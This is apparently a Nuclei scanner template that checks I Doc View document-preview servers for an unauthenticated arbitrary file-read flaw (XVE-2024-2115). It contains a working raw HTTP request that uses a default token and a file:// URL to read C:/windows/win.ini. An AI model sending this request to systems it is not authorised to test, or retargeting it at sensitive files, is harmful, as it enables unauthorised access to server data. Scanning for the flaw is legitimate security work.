id: I-Doc-View-qJvqhFt-File-reading

info:
  name: I Doc View 在线文档预览 qJvqhFt.json 任意文件读取漏洞(XVE-2024-2115)
  author: Superhero
  severity: medium
  description: |-
    title=="在线文档预览 - I Doc View"
    iDocView是一个在线文档预览系统 /iew/gJvghftjson 接口处存在任意文件读取漏洞，未授权的攻击者可以利用此接口并携带默认token读取服务器敏感文件信息，使系统处于极度不安全的状态。
  reference:
    - https://blog.csdn.net/m0_60571842/article/details/139509499
  tags: File reading

http:
  - raw:
      - |
        GET /view/qJvqhFt.json?start=1&size=5&url=file%3A%2F%2F%2FC%3A%2Fwindows%2Fwin.ini&idocv_auth=sapi HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'for 16-bit app support'
      - type: status
        status: 
          - 200





